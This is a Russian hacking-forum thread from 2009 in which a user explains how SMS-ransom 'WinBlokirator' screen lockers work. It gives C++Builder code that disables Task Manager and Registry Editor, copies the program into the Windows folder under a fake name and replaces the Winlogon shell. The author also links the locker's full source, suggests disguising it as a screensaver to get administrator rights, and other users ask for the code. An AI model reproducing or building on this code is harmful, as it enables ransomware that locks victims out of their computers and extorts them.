Форум АНТИЧАТ
Страница 1 из 2 1 2 >
Показывать 40 сообщений этой темы на одной странице

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Авторские статьи (https://forum.antichat.xyz/forumdisplay.php?f=31)
-   -   WindowsBlock (теория в примерах) (https://forum.antichat.xyz/showthread.php?t=125209)

POS_troi 14.06.2009 15:34
WindowsBlock (теория в примерах)
 
Прелюдия
Тут один персонаж доставал меня по поводу «что такое «WinBlokirator» » и как оно работает.
Сразу оговорюсь, что статейка для опытных людей ничего нового не даст но вот для новичков в целях общего развития вполне подойдет.

И так, программы класса «WinBlokirator» можно отнести к вредоносным программам но как правило в ихнюю задачу входит только заставить пользователя отправить SMS на платный номер за что и обещают вернуть все на свои места (покрайне мере два варианта которые реверснул только это и делали).

Проникать на компьютер может любым из доступных способов и тут ничем не отличается от техже «KIDO», «Sality» а тоесть путем атаки на уязвимости в сервисах Windows (MS08-067,MS08-068,MS09-001), Интернет браузеров, склейка с исполняемыми файлами, а также через автозапуск съемных накопителей (Flash, CD,DVD и т.д.).

Проникая на компьютер жертвы «программа» (будем так называть) первым делом должна обеспечить себе безопасное пребывание и по максимуму усложнить возможность избавиться от нее не выполнив указанной просьбы (например, отправку SMS) - это достигается путем блокирования «Диспетчера задач», «Редактора реестра», «Загрузка в безопасном режиме/командной строки»

Вот пример возможного кода
(CodeGear C++Builder 2009)

Код:
// Запрещаем Редактирование реестра
reg = new TRegistry();
reg->RootKey=HKEY_CURRENT_USER;
reg->OpenKey("Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System",true);
reg->WriteInteger("DisableRegistryTools",1);
reg->CloseKey();

// Запрещаем Диспетчер задач
reg->RootKey=HKEY_CURRENT_USER;
reg->OpenKey("Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System",true);
reg->WriteInteger("DisableTaskMgr",1);
reg->CloseKey();
// Запрещаем Загрузку в режиме MS-DOS
reg->RootKey= HKEY_CURRENT_USER;
reg->OpenKey("Software\\ Microsoft\\ Windows\\ CurrentVersion\\ Policies\\WinOldApp",true);
reg->WriteInteger("NoRealMode",1);
reg->CloseKey();
Далее необходимо скопировать себя, куда нибудь в католог Windows – примерно следующим кодом:

Код:
ZeroMemory(CMD,500);
lstrcat(CMD,"cmd /c copy ");
lstrcat(CMD,Application->ExeName.t_str());
lstrcat(CMD," %WinDir%\\Expl0rer.exe"); //(Expl0rer.exe имя cс которым скопировать наш файл в каталог  WINDOWS)
WinExec(CMD,0);
Чтобы при следующей загрузке Windows заблокировать компьютер нам необходимо заменить SHELL Windows (Explorer.exe) на свою программу, что делается путем изменения значения в ветке
Код:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell
Программная реализация:
Код:
reg->RootKey=HKEY_LOCAL_MACHINE;
reg->OpenKey("\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon",true);
reg->WriteString("Shell","Expl0rer.exe");  //(Expl0rer.exe имя нашей программы в каталоге WINDOWS)
reg->CloseKey();
Теперь наша программа обеспечила себе возможность спокойно жить на компьютере и запуск при страте системы (путем подмены SHELL-a системы).

Реализация интерфейса
это уже дело вкуса каждого и ничего сложного в этом нет и логика работы простейшая:

1. Говорим что куда отправлять
2. Проверяем введенный код на корректность
3. Если корректно то возвращаем все на свои места в обратной последовательности.

Вот такая вот простая, в общем, технология, на которой умудряются зарабатывать деньги.

Вот несколько скринов программы, которая писалась специально для одной фирмы, которая не хотела покупать лицензионное ПО а Админ очень сильно волновался по этому поводу.


http://img200.imageshack.us/img200/264/35890905.th.jpg http://img200.imageshack.us/img200/5714/73792161.th.jpg http://img20.imageshack.us/img20/8530/75565866.th.jpg http://img20.imageshack.us/img20/7941/54953870.th.jpg http://img20.imageshack.us/img20/511/90036046.th.jpg

Она действовала по то муже принципу что и выше но только никаких кодов не просила =)
P.S. Фирма купила лицензии =)


Ну критикуйте меня.
Могу выложить исходники "блокиратора" со скринов - если модераторы не против. (код не супер красивый но вполне читабельный)

Вообщем исходник.
http://rapidshare.com/files/250975578/1.rar_.html
MD5: 40991CEE044C713F1D8E671B0FA6D1EF

jawbreaker 14.06.2009 15:46
В каких версиях Windows работает? UAC помогает от этого или нет?

POS_troi 14.06.2009 15:50
На висте не тестировал (каюсь) когда меня попросили написать ЭТО то цель ставилась в направлении WINDOWS XP PRO SP3

gibson 15.06.2009 12:45
Цитата:
Сообщение от POS_troi
На висте не тестировал (каюсь) когда меня попросили написать ЭТО то цель ставилась в направлении WINDOWS XP PRO SP3
В висте не позволит, пробовали на ноуте, фс стоит нтфс, в папку винды и в корень диска, во все системные папки + таск менеджер. Нужны права "супер админа"

POS_troi 15.06.2009 18:29
Можно пойти путем "СИ" например под скринсевер замаскировать и проверять при запуске права - если не Администратор то выдавать красивое окошко , мол "Извините но у вас не получиться установить наш супер красивый и клевый скрисевер без прав Администратора"

SpangeBoB 15.06.2009 19:06
Цитата:
Сообщение от gibson
В висте не позволит, пробовали на ноуте, фс стоит нтфс, в папку винды и в корень диска, во все системные папки + таск менеджер. Нужны права "супер админа"
Повашему в Xp в раздел HKLM и в %windir% может обычный пользователь писать?Так что это работает везде в независимости от ОС(xp,vista).В обоих случаях нужно права администратора и UAC ну ничем не попрепятствует.Что в xp потребуется runas,что в Vista запустится UAC.Если работать по умолчанию в виста под записью входящей в группу администраторы и не править настройки,то выведется уведомления о повышении прав,где достаточно нажать далее.

gibson 15.06.2009 19:55
Цитата:
Повашему в Xp в раздел HKLM и в %windir% может обычный пользователь писать?
Я еще не видел, чтобы при установки винды (ХР) получался "обычный" пользователь. За это ХР и "любят" до сих пор, то что лишних вопросов не задает в отличии от висты и 7ки. Да и кто с этим будет возиться?

Цитата:
Если работать по умолчанию в виста под записью входящей в группу администраторы и не править настройки,то выведется уведомления о повышении прав,где достаточно нажать далее.
Под скрытую установку это не очень похоже. Мы тестировали несколько софтин, так что под ХР устанавливается на ура, в висте не проходит.

m03G 15.06.2009 20:38
ТС, дай линк пожалуйста на исходники в личку буду благодарен.

skam777 15.06.2009 20:42
Цитата:
Сообщение от m03G
ТС, дай линк пожалуйста на исходники в личку буду благодарен.
и мне

SpangeBoB 15.06.2009 20:45
Цитата:
Сообщение от gibson
Я еще не видел, чтобы при установки винды (ХР) получался "обычный" пользователь. За это ХР и "любят" до сих пор, то что лишних вопросов не задает в отличии от висты и 7ки. Да и кто с этим будет возиться?


Под скрытую установку это не очень похоже. Мы тестировали несколько софтин, так что под ХР устанавливается на ура, в висте не проходит.
Пользователь тыкнет на 90% да при проявлении окна UAC,а в 99% попросит его отключить UAC ,заметит опытный пользователь который не когда не будет сидеть под записью администратора что в Xp ,что в Vista.А в 7 тем более там по умолчанию еще больше снижен UAC и отключается на раз,еще покрепче держится только самый высокий уровень.


Время: 09:46
Страница 1 из 2 1 2 >
Показывать 40 сообщений этой темы на одной странице